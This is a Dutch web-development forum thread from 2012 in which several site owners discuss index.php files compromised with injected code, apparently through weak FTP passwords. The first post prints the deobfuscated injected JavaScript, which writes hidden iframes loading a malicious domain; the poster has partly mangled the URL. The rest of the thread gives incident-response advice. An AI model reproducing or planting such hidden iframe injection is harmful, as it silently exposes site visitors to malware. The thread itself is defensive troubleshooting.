Gehacked? Script of server

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Alex Hakkenberg

Alex Hakkenberg

15/02/2012 20:17:43
Quote Anchor link
Goedenavond,

Vanavond ben ik in paniek gebeld door een vriend. Zijn site gaf een virus melding....
Even kijken.
En inderdaad een hele leuke foutmelding.:
Afbeelding

Als ik in de code kijk zie ik:
Afbeelding

Nu ik die code verwijderen. En helaas een twee uur later staat dezelfde code er weer in.

Ik vraag mij nu dus twee dingen af. Zit er één of ander script op dat kijkt of ze er nog in zit? (de code) of is dat één of ander kind wat leuk bijverdient in een heel arm land?

Ten tweede.. Hoe is hij gehacked? Is het de server zelf of is dit gewoon gebruik maken van een lek in het CMS systeem?

Bij voorbaat dank

Toevoeging op 15/02/2012 20:20:06:

Als ik met Javascript unpacker het scriptje bekijk komt er dit uit:

//eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);} //document.write (s) <iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var ss = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
Gewijzigd op 15/02/2012 21:02:51 door Alex Hakkenberg
 
PHP hulp

PHP hulp

08/11/2024 14:46:34
 
- Ariën  -
Beheerder

- Ariën -

15/02/2012 20:42:59
Quote Anchor link
Haal die URL's er maar even uit, voordat iemand bij het onderzoeken zelf geinfecteerd raakt.

Het beste is om (samen met de provider) de logs door te spitten, en de PC waarmee je FTP-connecties aanlegt even flink door te lichten met een virusscan. Laat je hosting ook per direct de FTP-inloggegevens aanpassen.
 
Alex Hakkenberg

Alex Hakkenberg

15/02/2012 20:55:04
Quote Anchor link
Dank je :-)
Gewijzigd op 15/02/2012 21:01:56 door Alex Hakkenberg
 
Frank WD

Frank WD

16/02/2012 00:06:48
Quote Anchor link
Alex,

Deze melding heb ik vandaag ook gekregen op de website.
Na onderzoeken op de server bleek de index.php aangepast te zijn op 16:46 vandaag.

Echter kreeg ik de file op geen enkele manier open laat staan dat ik het kon opslaan.
Elke pc die ik probeerde ging gelijk de alarm bellen rinkelen.

In de logs was niks te vinden wat er op deed vermoeden dat er was ingelogt of was gehackt op die tijdstip. Wij hebben daarom alle wachtwoorden van mysql, admin panell en ftp verandert en een complete server backup terug gezet.

Dit lijkt het probleem te hebben verholpen. Tevens laat de proveider zowiezo op virus en malware scannen.
 
Koekjes Bakker

Koekjes Bakker

16/02/2012 12:58:30
Quote Anchor link
Hallo,

Sinds 6:10 vanmorgen had ik deze Malware ook op mijn website.
Ik heb de code kunnen verwijdreren maar ik heb geen idee waar het vandaan komt.

Ik heb duizenden bezoekers per dag, en honderden tegelijk online.
Dit is wel een groot probleem voor mij, weet iemand hier meer over?

En is dit OS gevoelig en dergelijk?

Bedankt.

Script:
http://pastebin.com/dARUvBZ7
Gewijzigd op 16/02/2012 12:59:10 door Koekjes Bakker
 
- Ariën  -
Beheerder

- Ariën -

16/02/2012 13:20:46
Quote Anchor link
het kan beiden zijn.

Ga zelf eerst een naar virussen scannen, en laat dan je hosting het de wachtwoorden aanpassen.
Gewijzigd op 16/02/2012 13:21:01 door - Ariën -
 
Jens erd

Jens erd

16/02/2012 15:29:10
Quote Anchor link
Wat meer informatie is welkom, Toevallig Joomla!, wordpress of een ander framework draaien?
 
Alex Hakkenberg

Alex Hakkenberg

16/02/2012 16:23:36
Quote Anchor link
In onze situatie betrof het een geheel custom oplossing.
En een paar prestashop installaties.
 
Jip van Kakerken

Jip van Kakerken

16/02/2012 16:56:49
Quote Anchor link
Hoi, Ik heb vandaag op 2 sites van mij precies dezelfde error gekregen.
Gebruik je toevallig een kant en klaar contact formulier? Ik gebruik die namelijk wel, iets va Free form mail tool ofzo. Ik vermoed dat via het contact formulier iets in de index.php gezet is. Heb net naar ISND gebeld en zij zeiden dat het 99 van de 100 x een foutieve onveilige code is waarvan erg vaak een contact formulier.

Groeten
 
Koekjes Bakker

Koekjes Bakker

16/02/2012 17:06:04
Quote Anchor link
Ik heb ook een zelf geschreven website, en geen Frameworks, ik zal mijn forms doorzoeken, kan iemand mij misschien vertellen naar wat van beveileging in dan moet kijken?

mysql_rea_escape_string(); ?

Met vriendelijke groet,
Dave

Edit: ik had ook meerde website's draaien op een server, alle indexes die in mijn webfolder stonden zijn gewijzigt, ook van andere domeinen in onderliggende mappen.
En het word ingevoegd na het openen van de <body> tag.
Gewijzigd op 16/02/2012 17:22:41 door Koekjes Bakker
 
Jip van Kakerken

Jip van Kakerken

16/02/2012 17:29:01
Quote Anchor link
Van beveiliging weet ik niks, daarom heb ik ook zelf geen formulier gemaakt maar er 1 laten genereren.

Ik zal zowiezo als test het contact formulier helemaal uit de site halen. Als alsnog de index wordt gewijzigd, ligt het niet aan het form maar aan de PC waarmee de ftp wordt bediend.

Heb zowiezo ook al een mail naar mijn hoster gestuurd.
 
Alex Hakkenberg

Alex Hakkenberg

16/02/2012 17:39:15
Quote Anchor link
Nou bij ons zijn ze binnengekomen via de FTP. Een te zwak wachtwoord.
Inmiddels zijn ook alle wachtwoorden vervangen.

Dus ik verwacht niet het contact form.
 
Koekjes Bakker

Koekjes Bakker

16/02/2012 18:37:48
Quote Anchor link
Oke bedankt, ik had de logs niet aan voor mijn FTP server hellaas, nu wel, en ik had een zwak wachtwoord op een FTP account, deze heb ik gewijzigt natuurlijk na het contanteren van de "hack".

Bedankt voor de reacties!
 
Jip van Kakerken

Jip van Kakerken

16/02/2012 18:45:25
Quote Anchor link
Mijn ftp login is zo random als het maar zijn kan.
En daarbij komt dat de 2 sites die gehackt zijn op 2 andere servers stonden.
Dat is ook nog eens heel erg vreemd.
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.